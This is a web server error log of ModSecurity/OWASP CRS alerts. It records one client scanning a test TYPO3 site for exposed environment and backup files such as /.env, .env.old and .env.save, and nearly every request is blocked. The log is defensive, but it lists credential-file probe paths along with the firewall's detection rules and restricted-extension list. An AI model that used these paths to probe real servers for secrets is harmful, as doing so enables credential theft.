[Fri Nov 21 10:13:00.108479 2025] [:error] [pid 223952] [client 15.223.224.122:48834] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.save"] [unique_id "aSAtHJIgILTHWk6gdY_zVwAAAAA"]
[Fri Nov 21 10:13:00.108649 2025] [:error] [pid 223952] [client 15.223.224.122:48834] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.save"] [unique_id "aSAtHJIgILTHWk6gdY_zVwAAAAA"]
[Fri Nov 21 10:13:00.128699 2025] [:error] [pid 229737] [client 15.223.224.122:48792] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aSAtHOSNO7cObITHQGDnqgAAAAQ"]
[Fri Nov 21 10:13:00.128872 2025] [:error] [pid 229737] [client 15.223.224.122:48792] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aSAtHOSNO7cObITHQGDnqgAAAAQ"]
[Fri Nov 21 10:13:00.129124 2025] [:error] [pid 229737] [client 15.223.224.122:48792] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aSAtHOSNO7cObITHQGDnqgAAAAQ"]
[Fri Nov 21 10:13:00.129310 2025] [:error] [pid 229737] [client 15.223.224.122:48792] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aSAtHOSNO7cObITHQGDnqgAAAAQ"]
[Fri Nov 21 10:13:00.155328 2025] [:error] [pid 224163] [client 15.223.224.122:48824] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.save"] [unique_id "aSAtHI-vpBn5AqkyjcS1GAAAAAs"]
[Fri Nov 21 10:13:00.155567 2025] [:error] [pid 224163] [client 15.223.224.122:48824] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.save"] [unique_id "aSAtHI-vpBn5AqkyjcS1GAAAAAs"]
[Fri Nov 21 10:13:00.155755 2025] [:error] [pid 224163] [client 15.223.224.122:48824] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.save"] [unique_id "aSAtHI-vpBn5AqkyjcS1GAAAAAs"]
[Fri Nov 21 10:13:00.176723 2025] [:error] [pid 224149] [client 15.223.224.122:48798] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aSAtHMsPY-oBfuAti3FYwwAAAAU"]
[Fri Nov 21 10:13:00.176907 2025] [:error] [pid 224149] [client 15.223.224.122:48798] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aSAtHMsPY-oBfuAti3FYwwAAAAU"]
[Fri Nov 21 10:13:00.177140 2025] [:error] [pid 224149] [client 15.223.224.122:48798] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aSAtHMsPY-oBfuAti3FYwwAAAAU"]
[Fri Nov 21 10:13:00.177345 2025] [:error] [pid 224149] [client 15.223.224.122:48798] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aSAtHMsPY-oBfuAti3FYwwAAAAU"]
[Fri Nov 21 10:13:00.212299 2025] [:error] [pid 223953] [client 15.223.224.122:48826] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSAtHD27u3u2us0kkkbyAAAAAAE"]
[Fri Nov 21 10:13:00.212515 2025] [:error] [pid 223953] [client 15.223.224.122:48826] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSAtHD27u3u2us0kkkbyAAAAAAE"]
[Fri Nov 21 10:13:00.212708 2025] [:error] [pid 223953] [client 15.223.224.122:48826] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSAtHD27u3u2us0kkkbyAAAAAAE"]
[Fri Nov 21 10:13:00.226173 2025] [:error] [pid 223954] [client 15.223.224.122:48778] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aSAtHIPLQdWysfkg-aEKAgAAAAI"]
[Fri Nov 21 10:13:00.226421 2025] [:error] [pid 223954] [client 15.223.224.122:48778] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aSAtHIPLQdWysfkg-aEKAgAAAAI"]
[Fri Nov 21 10:13:00.226602 2025] [:error] [pid 223954] [client 15.223.224.122:48778] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aSAtHIPLQdWysfkg-aEKAgAAAAI"]
[Fri Nov 21 10:13:00.260123 2025] [authz_core:error] [pid 223955] [client 15.223.224.122:48810] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/src
[Fri Nov 21 10:13:00.587038 2025] [authz_core:error] [pid 224162] [client 15.223.224.122:49170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/public
[Fri Nov 21 10:13:04.319407 2025] [:error] [pid 224164] [client 15.223.224.122:50890] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.save"] [unique_id "aSAtIHwkd7Eed7ZXqoT4fQAAAAw"]
[Fri Nov 21 10:13:04.319629 2025] [:error] [pid 224164] [client 15.223.224.122:50890] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.save"] [unique_id "aSAtIHwkd7Eed7ZXqoT4fQAAAAw"]
[Fri Nov 21 10:13:04.319846 2025] [:error] [pid 224164] [client 15.223.224.122:50890] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.save"] [unique_id "aSAtIHwkd7Eed7ZXqoT4fQAAAAw"]
[Fri Nov 21 10:13:04.331073 2025] [:error] [pid 223952] [client 15.223.224.122:50858] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aSAtIJIgILTHWk6gdY_zWAAAAAA"]
[Fri Nov 21 10:13:04.331227 2025] [:error] [pid 223952] [client 15.223.224.122:50858] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aSAtIJIgILTHWk6gdY_zWAAAAAA"]
[Fri Nov 21 10:13:04.331442 2025] [:error] [pid 223952] [client 15.223.224.122:50858] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aSAtIJIgILTHWk6gdY_zWAAAAAA"]
[Fri Nov 21 10:13:04.331609 2025] [:error] [pid 223952] [client 15.223.224.122:50858] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aSAtIJIgILTHWk6gdY_zWAAAAAA"]
[Fri Nov 21 10:13:04.398209 2025] [authz_core:error] [pid 229739] [client 15.223.224.122:50874] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/assets
[Fri Nov 21 10:13:04.441947 2025] [:error] [pid 229737] [client 15.223.224.122:50996] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aSAtIOSNO7cObITHQGDnqwAAAAQ"]
[Fri Nov 21 10:13:04.442123 2025] [:error] [pid 229737] [client 15.223.224.122:50996] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aSAtIOSNO7cObITHQGDnqwAAAAQ"]
[Fri Nov 21 10:13:04.442321 2025] [:error] [pid 229737] [client 15.223.224.122:50996] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aSAtIOSNO7cObITHQGDnqwAAAAQ"]
[Fri Nov 21 10:13:04.442524 2025] [:error] [pid 229737] [client 15.223.224.122:50996] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aSAtIOSNO7cObITHQGDnqwAAAAQ"]
[Fri Nov 21 10:13:04.503290 2025] [:error] [pid 224163] [client 15.223.224.122:51052] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aSAtII-vpBn5AqkyjcS1GQAAAAs"]
[Fri Nov 21 10:13:04.503500 2025] [:error] [pid 224163] [client 15.223.224.122:51052] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aSAtII-vpBn5AqkyjcS1GQAAAAs"]
[Fri Nov 21 10:13:04.503673 2025] [:error] [pid 224163] [client 15.223.224.122:51052] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aSAtII-vpBn5AqkyjcS1GQAAAAs"]
[Fri Nov 21 10:13:04.609983 2025] [:error] [pid 223954] [client 15.223.224.122:51074] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSAtIIPLQdWysfkg-aEKAwAAAAI"]
[Fri Nov 21 10:13:04.610227 2025] [:error] [pid 223954] [client 15.223.224.122:51074] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSAtIIPLQdWysfkg-aEKAwAAAAI"]
[Fri Nov 21 10:13:04.610437 2025] [:error] [pid 223954] [client 15.223.224.122:51074] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSAtIIPLQdWysfkg-aEKAwAAAAI"]
